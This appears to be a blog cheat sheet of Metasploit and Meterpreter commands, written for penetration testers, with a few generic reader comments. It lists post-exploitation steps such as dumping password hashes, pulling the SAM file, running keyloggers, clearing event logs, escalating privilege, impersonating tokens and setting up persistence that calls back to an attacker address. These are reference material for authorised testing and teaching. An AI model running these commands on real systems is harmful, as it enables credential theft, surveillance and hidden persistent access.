Metasploit Cheat Sheet for Ethical Hacker

Metasploit Cheat Sheet

What is Metasploit?

Metasploit is the world’s leading open-source penetrating framework used by security engineers as a penetration testing system and a development platform that allows to create security tools and exploits. The framework makes hacking simple for both attackers and defenders. 

Meterpreter commands-

Basic and file handling commands

sysinfoDisplay system in formation
psList and display running processes
kil​l (PID)Terminate a running process
getuidDisplay user ID
upload or downloadUpload / download a file
pwd or lpwdPrint working directory ( local / remote)
cd or lcdChange directory ( local or remote)
catDisplay file content
bglistshow background running scripts
bgrunmake a script run in the background
bgkillterminate a background process
backgroundMove active session to background
edit <FILE Name>Edit a file in vi editor
shellAccess shell on the target machine
migrate <PID>Switch to another process
idletimeDisplay idle time of user
screenshotTake a screenshot
clearevClear the system logs
? or HelpHelp sho​wing all the commands
exit / quit :Exit the Meterpreter session
shutdown / rebootRestart the system
useExtension load
channelShow active channels

Process handling commands

CommandDescription
getpid:Display the process ID
getuid:Display the user ID
ps:Display running process
Kill:Stop and terminate a process
getprivsShows multiple privileges as possible
regAccess target machine registry
ShellAccess target machine shell
execute:Run a specified
migrate:Move to a given destination process ID

Interface / output commands

enumdesktopsShow all available desktops
GetdesktopDisplay current desktop
keyscan_ startStart keylogger in target machine
Keyscan_ stopStop keylogger in target machine
set _desktopConfigure desktop
keyscan_dumpDump keylogger content

Password management commands

hashdumpAccess content of password file – Hash file

Msfvenom command options

SwitchSyntax Description
-p– p (Payload option)Display payload standard options
– l– l ( list type)List module type i .e payload, encoders
– f– f ( format )output format
– e-e (encoder)Define which encoder to use
-a– a (Architecture or platformDefine which platform to use
-s-s (Space)Define maximum payload capacity
-b-b (characters)Define set of characters not to use
– i– i (Number of times)Define number of times to use encoder
-x-x (File name)Define a custom file to use as template
– o-o (output)Save a payload
– h-hHelp

Example-

Meterpreter upload file to Windows target:

meterpreter> upload file c:\\windows

Meterpreter download file from Windows target:

meterpreter> download c:\\windows\\repair\\sam /tmp

Meterpreter run .exe on target – handy for executing uploaded exploits:

meterpreter> execute -f c:\\windows\\temp\\exploit.exe

Creates new channel with cmd shell:

meterpreter> execute -f cmd -c

Meterpreter show processes:

meterpreter> ps

Meterpreter get shell on the target:

meterpreter> shell

Meterpreter attempts priviledge escalation the target:

meterpreter> getsystem

Meterpreter attempts to dump the hashes on the target:

meterpreter> hashdump
meterpreter> credcollect

Meterpreter create port forward to target machine:

meterpreter> portfwd add –l 3389 –p 3389 –r $IP

Meterpreter delete port forward:

meterpreter> portfwd delete –l 3389 –p 3389 –r $IP

Search excel files on target machine:

meterpreter> search -f *.xlsx

Get user id:

meterpreter> getuid

Check whether arch == meterpreter or migrate to x64 process!!

meterpreter> sysinfo

Identify other machines that the supplied domain user has administrative access to

msf> run post/windows/gather/local_admin_search_enum
msf> connect $TARGET $PORT

Uses SSL:

msf> connect -s $TARGET $PORT

Starts ruby shell:

msf> irb

Integrations with other tools:

msf> load pcap, wmap, nessus
msf> db_hosts
msf> db_vulns
msf> db_exploited

Meterpreter persistence mode

meterpreter> run persistence -U -i 5 -p 443 -r $IP

Impersonate any user

meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token MACHINE\\user
meterpreter> drop_token

Metasploit Full Course

3 Comments

  1. I like what you guys are up too. Such smart work and reporting! Carry on the superb works guys I抳e incorporated you guys to my blogroll. I think it’ll improve the value of my site 🙂

  2. It is the best time to make some plans for the future and it is time to be happy. I’ve read this post and if I could I want to suggest you some interesting things or advice. Maybe you can write next articles referring to this article. I wish to read more things about it!

Leave a Reply